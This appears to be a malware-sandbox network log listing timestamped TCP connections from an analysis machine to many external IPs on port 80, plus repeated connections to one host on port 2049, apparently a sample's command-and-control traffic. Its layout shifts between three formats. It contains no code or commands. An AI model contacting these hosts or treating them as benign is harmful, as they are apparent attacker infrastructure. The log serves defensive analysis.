                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:54.401403904 CET597362049192.168.2.5212.162.149.53
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:54.589808941 CET5974280192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:54.594675064 CET805974247.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:54.594809055 CET5974280192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:54.595113039 CET5974280192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:54.595180035 CET5974280192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:54.600017071 CET805974247.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:54.600033998 CET805974247.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:55.591325998 CET805973718.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:55.591576099 CET5973780192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:55.597100019 CET805973718.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:55.597179890 CET5973780192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:55.638015985 CET5974380192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:55.642838001 CET805974318.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:55.642927885 CET5974380192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:55.651700974 CET5974380192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:55.651720047 CET5974380192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:55.656575918 CET805974318.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:55.656642914 CET805974318.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:56.039856911 CET805974247.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:56.040066957 CET5974280192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:56.045418024 CET805974247.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:56.045555115 CET5974280192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:56.321914911 CET805974318.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:56.324135065 CET5974380192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:56.329643965 CET805974318.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:56.330949068 CET5974380192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:59.926274061 CET80597493.94.10.34192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:59.926362991 CET5974980192.168.2.53.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:00.236598015 CET5975280192.168.2.518.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:00.242456913 CET805975218.246.231.120192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:00.242527008 CET5975280192.168.2.518.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:00.242958069 CET5975280192.168.2.518.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:00.242971897 CET5975280192.168.2.518.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:00.247828960 CET805975218.246.231.120192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:00.247838974 CET805975218.246.231.120192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:00.505268097 CET805975118.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:00.505645990 CET5975180192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:00.510989904 CET805975118.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:00.511080980 CET5975180192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:00.538250923 CET5975380192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:00.543190956 CET805975313.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:00.543935061 CET5975380192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:00.544456005 CET5975380192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:00.544485092 CET5975380192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:00.550069094 CET805975313.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:00.550280094 CET805975313.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:01.078316927 CET805975218.246.231.120192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:01.078521013 CET5975280192.168.2.518.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:01.083801031 CET805975218.246.231.120192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:01.083878994 CET5975280192.168.2.518.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:01.318288088 CET5975480192.168.2.53.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:01.323204041 CET80597543.254.94.185192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:01.323301077 CET5975480192.168.2.53.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:01.323533058 CET5975480192.168.2.53.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:01.323553085 CET5975480192.168.2.53.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:01.328494072 CET80597543.254.94.185192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:01.328670979 CET80597543.254.94.185192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:01.988516092 CET805975313.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:01.988732100 CET5975380192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:01.993881941 CET805975313.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:01.993953943 CET5975380192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:02.031409979 CET5975580192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:02.036545038 CET805975513.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:02.036730051 CET5975580192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:02.036928892 CET5975580192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:02.036928892 CET5975580192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:02.041853905 CET805975513.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:02.041867018 CET805975513.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:02.291873932 CET80597543.254.94.185192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:02.292123079 CET5975480192.168.2.53.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:02.298626900 CET80597543.254.94.185192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:02.298701048 CET5975480192.168.2.53.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:02.571988106 CET5975680192.168.2.585.214.228.140
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:02.576859951 CET805975685.214.228.140192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:02.577042103 CET5975680192.168.2.585.214.228.140
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:02.583544016 CET5975680192.168.2.585.214.228.140
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:02.583578110 CET5975680192.168.2.585.214.228.140
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:02.588524103 CET805975685.214.228.140192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:02.588535070 CET805975685.214.228.140192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:03.450649023 CET805975685.214.228.140192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:03.489908934 CET805975513.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:03.490080118 CET5975580192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:03.495346069 CET805975513.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:03.495404005 CET5975580192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:03.497009039 CET5975680192.168.2.585.214.228.140
Timestamp                           Src Port  Dst Port  Source IP       Dest IP
Nov 5, 2024 17:04:03.525305033 CET  59757     80        192.168.2.5     34.211.97.45
Nov 5, 2024 17:04:03.530249119 CET  80        59757     34.211.97.45    192.168.2.5
Nov 5, 2024 17:04:03.530320883 CET  59757     80        192.168.2.5     34.211.97.45
Nov 5, 2024 17:04:03.530846119 CET  59757     80        192.168.2.5     34.211.97.45
Nov 5, 2024 17:04:03.530874968 CET  59757     80        192.168.2.5     34.211.97.45
Nov 5, 2024 17:04:03.535695076 CET  80        59757     34.211.97.45    192.168.2.5
Nov 5, 2024 17:04:03.535706043 CET  80        59757     34.211.97.45    192.168.2.5
Nov 5, 2024 17:04:03.699820995 CET  59758     80        192.168.2.5     47.129.31.212
Nov 5, 2024 17:04:03.705414057 CET  80        59758     47.129.31.212   192.168.2.5
Nov 5, 2024 17:04:03.707117081 CET  59758     80        192.168.2.5     47.129.31.212
Nov 5, 2024 17:04:03.707349062 CET  59758     80        192.168.2.5     47.129.31.212
Nov 5, 2024 17:04:03.707367897 CET  59758     80        192.168.2.5     47.129.31.212
Nov 5, 2024 17:04:03.714268923 CET  80        59758     47.129.31.212   192.168.2.5
Nov 5, 2024 17:04:03.714405060 CET  80        59758     47.129.31.212   192.168.2.5
Nov 5, 2024 17:04:04.363642931 CET  80        59757     34.211.97.45    192.168.2.5
Nov 5, 2024 17:04:04.369368076 CET  59757     80        192.168.2.5     34.211.97.45
Nov 5, 2024 17:04:04.375519991 CET  80        59757     34.211.97.45    192.168.2.5
Nov 5, 2024 17:04:04.377218008 CET  59757     80        192.168.2.5     34.211.97.45
Nov 5, 2024 17:04:04.421638012 CET  59759     80        192.168.2.5     47.129.31.212
Nov 5, 2024 17:04:04.426453114 CET  80        59759     47.129.31.212   192.168.2.5
Nov 5, 2024 17:04:04.426599979 CET  59759     80        192.168.2.5     47.129.31.212
Nov 5, 2024 17:04:04.427057028 CET  59759     80        192.168.2.5     47.129.31.212
Nov 5, 2024 17:04:04.427057028 CET  59759     80        192.168.2.5     47.129.31.212
Nov 5, 2024 17:04:04.431874037 CET  80        59759     47.129.31.212   192.168.2.5
Nov 5, 2024 17:04:04.431924105 CET  80        59759     47.129.31.212   192.168.2.5
Nov 5, 2024 17:04:04.921108961 CET  59760     2049      192.168.2.5     212.162.149.53
Nov 5, 2024 17:04:04.926009893 CET  2049      59760     212.162.149.53  192.168.2.5
Nov 5, 2024 17:04:04.926098108 CET  59760     2049      192.168.2.5     212.162.149.53
Nov 5, 2024 17:04:04.931854010 CET  59760     2049      192.168.2.5     212.162.149.53
Nov 5, 2024 17:04:04.936729908 CET  2049      59760     212.162.149.53  192.168.2.5
Nov 5, 2024 17:04:05.142234087 CET  80        59758     47.129.31.212   192.168.2.5
Nov 5, 2024 17:04:05.142606020 CET  59758     80        192.168.2.5     47.129.31.212
Nov 5, 2024 17:04:05.147835970 CET  80        59758     47.129.31.212   192.168.2.5
Nov 5, 2024 17:04:05.147965908 CET  59758     80        192.168.2.5     47.129.31.212
Nov 5, 2024 17:04:05.411500931 CET  2049      59760     212.162.149.53  192.168.2.5
Nov 5, 2024 17:04:05.411595106 CET  59760     2049      192.168.2.5     212.162.149.53
Nov 5, 2024 17:04:05.411936998 CET  59760     2049      192.168.2.5     212.162.149.53
Nov 5, 2024 17:04:05.673758030 CET  59761     80        192.168.2.5     34.211.97.45
Nov 5, 2024 17:04:05.679622889 CET  80        59761     34.211.97.45    192.168.2.5
Nov 5, 2024 17:04:05.679699898 CET  59761     80        192.168.2.5     34.211.97.45
Nov 5, 2024 17:04:05.679887056 CET  59761     80        192.168.2.5     34.211.97.45
Nov 5, 2024 17:04:05.679903030 CET  59761     80        192.168.2.5     34.211.97.45
Nov 5, 2024 17:04:05.685915947 CET  80        59761     34.211.97.45    192.168.2.5
Nov 5, 2024 17:04:05.685928106 CET  80        59761     34.211.97.45    192.168.2.5
Nov 5, 2024 17:04:05.847815037 CET  80        59759     47.129.31.212   192.168.2.5
Nov 5, 2024 17:04:05.848001003 CET  59759     80        192.168.2.5     47.129.31.212
Nov 5, 2024 17:04:05.854352951 CET  80        59759     47.129.31.212   192.168.2.5
Nov 5, 2024 17:04:05.854454994 CET  59759     80        192.168.2.5     47.129.31.212
Nov 5, 2024 17:04:05.901132107 CET  59762     80        192.168.2.5     13.251.16.150
Nov 5, 2024 17:04:05.906119108 CET  80        59762     13.251.16.150   192.168.2.5
Nov 5, 2024 17:04:05.906220913 CET  59762     80        192.168.2.5     13.251.16.150
Nov 5, 2024 17:04:05.906404972 CET  59762     80        192.168.2.5     13.251.16.150
Nov 5, 2024 17:04:05.906457901 CET  59762     80        192.168.2.5     13.251.16.150
Nov 5, 2024 17:04:05.913743019 CET  80        59762     13.251.16.150   192.168.2.5
Nov 5, 2024 17:04:05.913758039 CET  80        59762     13.251.16.150   192.168.2.5
Nov 5, 2024 17:04:06.510561943 CET  80        59761     34.211.97.45    192.168.2.5
Nov 5, 2024 17:04:06.510859966 CET  59761     80        192.168.2.5     34.211.97.45
Nov 5, 2024 17:04:06.517472982 CET  80        59761     34.211.97.45    192.168.2.5
Nov 5, 2024 17:04:06.517592907 CET  59761     80        192.168.2.5     34.211.97.45
Nov 5, 2024 17:04:06.869776011 CET  59763     80        192.168.2.5     47.129.31.212
Nov 5, 2024 17:04:06.874650955 CET  80        59763     47.129.31.212   192.168.2.5
Nov 5, 2024 17:04:06.874752998 CET  59763     80        192.168.2.5     47.129.31.212
Nov 5, 2024 17:04:06.875323057 CET  59763     80        192.168.2.5     47.129.31.212
Nov 5, 2024 17:04:06.875462055 CET  59763     80        192.168.2.5     47.129.31.212
Nov 5, 2024 17:04:06.880171061 CET  80        59763     47.129.31.212   192.168.2.5
Nov 5, 2024 17:04:06.880747080 CET  80        59763     47.129.31.212   192.168.2.5
Nov 5, 2024 17:04:07.326438904 CET  80        59762     13.251.16.150   192.168.2.5
Nov 5, 2024 17:04:07.326703072 CET  59762     80        192.168.2.5     13.251.16.150
Nov 5, 2024 17:04:07.332106113 CET  80        59762     13.251.16.150   192.168.2.5
Nov 5, 2024 17:04:07.332212925 CET  59762     80        192.168.2.5     13.251.16.150
Nov 5, 2024 17:04:07.365673065 CET  59764     80        192.168.2.5     34.211.97.45
Nov 5, 2024 17:04:07.370692968 CET  80        59764     34.211.97.45    192.168.2.5
Nov 5, 2024 17:04:07.370804071 CET  59764     80        192.168.2.5     34.211.97.45
Nov 5, 2024 17:04:07.371391058 CET  59764     80        192.168.2.5     34.211.97.45
Nov 5, 2024 17:04:07.371409893 CET  59764     80        192.168.2.5     34.211.97.45
Nov 5, 2024 17:04:07.376283884 CET  80        59764     34.211.97.45    192.168.2.5
Nov 5, 2024 17:04:07.376331091 CET  80        59764     34.211.97.45    192.168.2.5
Nov 5, 2024 17:04:08.215600014 CET  80        59764     34.211.97.45    192.168.2.5
Nov 5, 2024 17:04:08.215948105 CET  59764     80        192.168.2.5     34.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:08.221231937 CET805976434.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:08.221304893 CET5976480192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:08.249470949 CET5976580192.168.2.53.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:08.254432917 CET80597653.94.10.34192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:08.254501104 CET5976580192.168.2.53.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:08.254694939 CET5976580192.168.2.53.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:08.254714012 CET5976580192.168.2.53.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:08.259654999 CET80597653.94.10.34192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:08.259665966 CET80597653.94.10.34192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:08.312319040 CET805976347.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:08.312525988 CET5976380192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:08.317734957 CET805976347.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:08.317816973 CET5976380192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:08.632221937 CET5976680192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:08.642043114 CET805976618.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:08.642129898 CET5976680192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:08.642319918 CET5976680192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:08.642338991 CET5976680192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:08.648552895 CET805976618.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:08.648565054 CET805976618.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:08.916470051 CET80597653.94.10.34192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:08.918622017 CET5976580192.168.2.53.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:08.924917936 CET80597653.94.10.34192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:08.925008059 CET5976580192.168.2.53.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:08.983334064 CET5976780192.168.2.518.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:08.988253117 CET805976718.246.231.120192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:08.988337040 CET5976780192.168.2.518.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:08.988497019 CET5976780192.168.2.518.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:08.988497019 CET5976780192.168.2.518.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:08.993490934 CET805976718.246.231.120192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:08.993501902 CET805976718.246.231.120192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:09.334265947 CET805976618.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:09.334528923 CET5976680192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:09.339728117 CET805976618.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:09.341830969 CET5976680192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:09.810683966 CET805976718.246.231.120192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:09.856529951 CET5976780192.168.2.518.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:09.894417048 CET5976780192.168.2.518.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:09.900628090 CET805976718.246.231.120192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:09.900755882 CET5976780192.168.2.518.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:09.941807985 CET5976880192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:09.948064089 CET805976813.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:09.948141098 CET5976880192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:09.950536013 CET5976880192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:09.950536966 CET5976880192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:09.956685066 CET805976813.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:09.956698895 CET805976813.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:09.971448898 CET5976980192.168.2.53.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:09.977562904 CET80597693.254.94.185192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:09.978442907 CET5976980192.168.2.53.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:09.978607893 CET5976980192.168.2.53.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:09.978621960 CET5976980192.168.2.53.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:09.984814882 CET80597693.254.94.185192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:09.985124111 CET80597693.254.94.185192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:10.420799017 CET597702049192.168.2.5212.162.149.53
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:10.425798893 CET204959770212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:10.425880909 CET597702049192.168.2.5212.162.149.53
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:10.426132917 CET597702049192.168.2.5212.162.149.53
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:10.435937881 CET204959770212.162.149.53192.168.2.5
Nov 5, 2024 17:04:10.536514044 CET | 80 | 59604 | 165.160.15.20 | 192.168.2.5
Nov 5, 2024 17:04:10.536602020 CET | 59604 | 80 | 192.168.2.5 | 165.160.15.20
Nov 5, 2024 17:04:10.541627884 CET | 59604 | 80 | 192.168.2.5 | 165.160.15.20
Nov 5, 2024 17:04:10.547538042 CET | 80 | 59604 | 165.160.15.20 | 192.168.2.5
Nov 5, 2024 17:04:10.916894913 CET | 2049 | 59770 | 212.162.149.53 | 192.168.2.5
Nov 5, 2024 17:04:10.916960955 CET | 59770 | 2049 | 192.168.2.5 | 212.162.149.53
Nov 5, 2024 17:04:10.917687893 CET | 59770 | 2049 | 192.168.2.5 | 212.162.149.53
Nov 5, 2024 17:04:10.946290970 CET | 80 | 59769 | 3.254.94.185 | 192.168.2.5
Nov 5, 2024 17:04:10.966521978 CET | 59769 | 80 | 192.168.2.5 | 3.254.94.185
Nov 5, 2024 17:04:10.972033024 CET | 80 | 59769 | 3.254.94.185 | 192.168.2.5
Nov 5, 2024 17:04:10.972122908 CET | 59769 | 80 | 192.168.2.5 | 3.254.94.185
Nov 5, 2024 17:04:11.039254904 CET | 59771 | 80 | 192.168.2.5 | 85.214.228.140
Nov 5, 2024 17:04:11.044099092 CET | 80 | 59771 | 85.214.228.140 | 192.168.2.5
Nov 5, 2024 17:04:11.044172049 CET | 59771 | 80 | 192.168.2.5 | 85.214.228.140
Nov 5, 2024 17:04:11.044851065 CET | 59771 | 80 | 192.168.2.5 | 85.214.228.140
Nov 5, 2024 17:04:11.044873953 CET | 59771 | 80 | 192.168.2.5 | 85.214.228.140
Nov 5, 2024 17:04:11.049652100 CET | 80 | 59771 | 85.214.228.140 | 192.168.2.5
Nov 5, 2024 17:04:11.050151110 CET | 80 | 59771 | 85.214.228.140 | 192.168.2.5
Nov 5, 2024 17:04:11.366755009 CET | 80 | 59768 | 13.251.16.150 | 192.168.2.5
Nov 5, 2024 17:04:11.367098093 CET | 59768 | 80 | 192.168.2.5 | 13.251.16.150
Nov 5, 2024 17:04:11.372889996 CET | 80 | 59768 | 13.251.16.150 | 192.168.2.5
Nov 5, 2024 17:04:11.372994900 CET | 59768 | 80 | 192.168.2.5 | 13.251.16.150
Nov 5, 2024 17:04:11.620368958 CET | 59772 | 80 | 192.168.2.5 | 34.246.200.160
Nov 5, 2024 17:04:11.625436068 CET | 80 | 59772 | 34.246.200.160 | 192.168.2.5
Nov 5, 2024 17:04:11.625572920 CET | 59772 | 80 | 192.168.2.5 | 34.246.200.160
Nov 5, 2024 17:04:11.626034021 CET | 59772 | 80 | 192.168.2.5 | 34.246.200.160
Nov 5, 2024 17:04:11.626050949 CET | 59772 | 80 | 192.168.2.5 | 34.246.200.160
Nov 5, 2024 17:04:11.630990028 CET | 80 | 59772 | 34.246.200.160 | 192.168.2.5
Nov 5, 2024 17:04:11.631006956 CET | 80 | 59772 | 34.246.200.160 | 192.168.2.5
Nov 5, 2024 17:04:11.918653965 CET | 80 | 59771 | 85.214.228.140 | 192.168.2.5
Nov 5, 2024 17:04:11.966443062 CET | 59771 | 80 | 192.168.2.5 | 85.214.228.140
Nov 5, 2024 17:04:11.990473986 CET | 59773 | 80 | 192.168.2.5 | 47.129.31.212
Nov 5, 2024 17:04:11.995342970 CET | 80 | 59773 | 47.129.31.212 | 192.168.2.5
Nov 5, 2024 17:04:11.995446920 CET | 59773 | 80 | 192.168.2.5 | 47.129.31.212
Nov 5, 2024 17:04:11.998214960 CET | 59773 | 80 | 192.168.2.5 | 47.129.31.212
Nov 5, 2024 17:04:11.998214960 CET | 59773 | 80 | 192.168.2.5 | 47.129.31.212
Nov 5, 2024 17:04:12.003087997 CET | 80 | 59773 | 47.129.31.212 | 192.168.2.5
Nov 5, 2024 17:04:12.003108978 CET | 80 | 59773 | 47.129.31.212 | 192.168.2.5
Nov 5, 2024 17:04:12.593164921 CET | 80 | 59772 | 34.246.200.160 | 192.168.2.5
Nov 5, 2024 17:04:12.623369932 CET | 59772 | 80 | 192.168.2.5 | 34.246.200.160
Nov 5, 2024 17:04:12.631879091 CET | 80 | 59772 | 34.246.200.160 | 192.168.2.5
Nov 5, 2024 17:04:12.631953001 CET | 59772 | 80 | 192.168.2.5 | 34.246.200.160
Nov 5, 2024 17:04:13.189834118 CET | 59774 | 80 | 192.168.2.5 | 18.141.10.107
